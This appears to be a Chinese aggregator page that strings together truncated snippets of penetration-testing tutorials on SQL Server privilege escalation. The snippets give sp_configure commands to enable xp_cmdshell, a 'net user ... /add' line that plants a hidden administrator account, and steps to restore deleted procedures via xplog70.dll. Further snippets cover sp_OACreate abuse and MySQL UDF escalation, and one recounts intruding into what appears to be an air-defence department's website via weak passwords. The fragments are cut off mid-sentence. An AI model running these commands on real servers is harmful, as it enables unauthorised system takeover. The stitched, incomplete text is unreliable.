SQLServer的XP_CmdShell提权】的更多相关文章

当我们拿到了某个网站SQLServer数据库的SA权限用户密码的话,我们就可以使用XP_CmdShell提权了. 开启xp_cmdshell exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure; 关闭xp_cmdshell exec sp_configure 'show advanced options', 1;reconfigure; ex…
先来介绍一下子服务器的基本情况,windows 2000 adv server 中文版,据称 打过了sp3,asp+iis+mssql .首先扫描了一下子端口,呵呵,开始的一般步骤. 端口21开放: FTP (Control)端口80开放: HTTP, World Wide Web端口135开放: Location Service端口139开放: NETBIOS Session Service端口1433开放: Microsoft-SQL-Server 开了几个很经典的端口,应该说个个都很经典啊…
本文原文地址:https://www.cnblogs.com/wintrysec/p/10875232.html 一.利用xp_cmdshell提权 xp_cmdshell默认是关闭的,可以通过下面的命令打开 ;;RECONFIGURE; 如果xp_cmdshell被删除了,可以上传xplog70.dll进行恢复 exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSS…
本文记录针对SQL Server数据库,在拿到shell之后进行提权的5种方法. 一. xp_cmdshell提权 上面的数据库连接需要知道sa的密码,连接之后,在下面的sql命令处执行: exec xp_cmdshell 'net user aaa aaa /add && net localgroup administrators aaa /add' 就能成功的创建一个账户aaa并且加到管理员组: 常见问题: 如果执行sql语句不成功,首先检查判断xp_cmdshell是否存在: sel…
在入侵过程中,得到SQLserver的权限,想进一步得到system权限的方法总结 *************************** 利用xp_cmdshell *********************************** 一.更改sa口令方法:用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'(提示:慎用!) 二.简单修补sa弱口令. 方法1:查询分离器连接后执行:if exists (select * from dbo.sy…
1.关于 "xp_cmdshell" "存储过程":其实质就是一个"集合",那么是什么样的结合呢,就是存储在SqlServer中预先定义好的"SQL语句集合",说的更直白一些就是使用T-SQL语言编写好的各种小脚本共同组成的集合体,我们称之为"存储过程". 而存储过程中的这些小脚本中,其危险性最高的"小脚本"就是扩展存储过程中的"xp_cmdshell脚本",它可以执…
0x01 前提 getshell或者存在sql注入并且能够执行命令. sql server是system权限,sql server默认就是system权限. 0x02 xp_cmdshell 有了xp_cmdshell的话可以执行系统命令,该组件默认是关闭的,因此需要把它打开. 开启xp_cmdshell exec sp_configure ;reconfigure; exec sp_configure ;reconfigure; 关闭xp_cmdshell exec sp_configure…
Cobalt Strike系列教程分享如约而至,新关注的小伙伴可以先回顾一下前面的内容: Cobalt Strike系列教程第一章:简介与安装 Cobalt Strike系列教程第二章:Beacon详解 Cobalt Strike系列教程第三章:菜单栏与视图 Cobalt Strike系列教程第四章:文件/进程管理与键盘记录 Cobalt Strike系列教程第五章:截图与浏览器代理 Cobalt Strike系列教程第六章:安装扩展 今天我们将继续分享Cobalt Strike系列教程的其他章…
前言:渗透测试中提权是较为重要的环节,若以低权限身份进行后渗透,测试出的问题相对于高权限的质量会低很多,从一个普通用户,通过手段让自己变为管理员,也可利用操作系统或者应用程序中的错误,设计缺陷或者配置错误来获取最高权限: 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局. Windows:User >> System Linux:User >> Root 提权方式 1.系统漏洞提权(Linux.windows) 2.数据库提权 3.系统配置错误提权 4.权限继承类…
遇到小人,把服务器整走了 自己手里只有sql server的sa账号密码 模糊记起之前用这个账户提权读取文件的事 百度之,发现相关信息一堆堆 各种工具也用了不少 发现不是语法错误就是权限不够 无奈之下装了sql server r2直接来操作 顺利连接上去,看到有master这个库. 直奔重点去 这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各种牛逼的方法去禁止普通用户使用它 尝试用正常的方法打开xp_cmdshell: EX…
[ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com…
1.SA口令的获取 webshell或源代码的获取 源代码泄露 嗅探(用CAIN等工具嗅探1433数据库端口) 口令暴力破解 2.常见SQL server 提权命令 查看数据库的版本(select @@version;) 查看数据库所在服务器操作系统的参数 查看数据库启动的参数 查看数据库启动的时间 查看数据库服务器名和实例名 查看用户登录信息 查看数据库里所所有的存储工程和函数 查看数据库里用户和进程的信息 恢复存储过程 开启和关闭xp_cmdshell xp_cmdshell执行命令 开启和…
i春秋作家:yangyangwithgnu 1 缘由 千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面.扩大战果,提权,是必经之路,也是后渗透阶段成功的关键.windows 提权,常用手法包括搜寻本地明文密码.DB 命令执行提权.内核 exp 提权.dll 劫持提权.路径未带引号的服务提权.滥用高权 token 提权.三方软件提权,每种手法有各自的使用门槛及适用场景,通常需要多种措施并举,才能拿下目标. 其中,若能在目标上搜寻…
net user SQLDebugger list /add net localgroup administrators SQLDebugger /add Error Message:未能找到存储过程 'master..xp_cmdshell'. 修复法:很通用的,其实碰到 其他126 127的都可以一起修复, 除了xplog70.dll其他的都可以用这命令修复 [/post]xp_cmdshell新的恢复办法 第一步先删除: drop procedure sp_addextendedproc …
在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权   首先   EXEC sp_configure 'show advanced options', 1;   RECONFIGURE WITH OVERRIDE;   EXEC sp_configure 'Ole Automation Procedures', 1;   RECONFIGURE WITH OVERRIDE;   EXEC sp_configure 'show advanced options…
4.数据库安全基础 4.1.MSSQL 数据库角色权限 sysadmin:执行SQL Server中的任何动作 db_owner:可以执行数据库中技术所有动作的用户 public:数据库的每个合法用户都属于该角色.它为数据库中的用户提供了所有默认权限. 数据库身份验证 SQL Server中的验证方式 Windows身份验证模式 SQL Server和Windows身份验证模式(混合模式) 常用命令 xp_cmdshell 执行命令 exec xp_cmdshell 'dir' sp_confi…
昨天中午打开电脑,对着菜刀在那翻啊翻,找到一个64bit的os. 因为这个ip不在曾经提权过的主机列表里面,心想这应该是个低权限的网站,顺手打个whoami试试,结果给我返回了"nt authoritysystem".看来这是一条"漏网之鱼"啊,于是就有了下面一段颇为蛋疼的经历. 查看系统信息,这是一台装了win server 2008 r2企业版的服务器,跑在VMware虚拟机上. 然后翻了下目录,web环境是Tomcat 5.5.7,搭的是SQL Server…
0x01 小隐拿站篇 某省还是市级还是县级的空防部 先来刺探目录,拿起御剑, 啪啪啪  (鼓掌)后台出来了   试试弱口令 擦  需要管理员验证码,这个咋玩????这个注入都不用找了,就算注射出账号密码也没用,你么有验证码啊 接着看扫到的信息,随便打开一个 安装信息 尼玛吓死我了 然后就特么进去了  超级.. 找上传  截断之  无果 找啊找  差异备份??  无果 后来找到了好东西 预览一下  这个好 我认识  你认识我不? 设置一下  会不会就这么简单? 图片格式:aspx  add 保存后…
MSSQL的提权:下面是三种方法一种利用xp_cmshell组件,还有一种sp_OACreate组件,COM组件 xp_cmshell组件的开启: 1.sql2005版本以后默认为关闭状态,需要开启命令执行 开启xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 注入点不支持多执行的话,需要一句一句的运行 ;exec…
日期:2018-04-03 11:46:45 作者:Bay0net 介绍:利用 mssql 的 sa 账号提权.利用 MySQL 的 UDF 提权 0x01.mssql 提权 恢复 xp_cmdshell 几个命令 # 查看是否存在 xp_cmdshell(返回非 0 即存在) select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'; # 不存在的话可以添加 EXEC sp_addexte…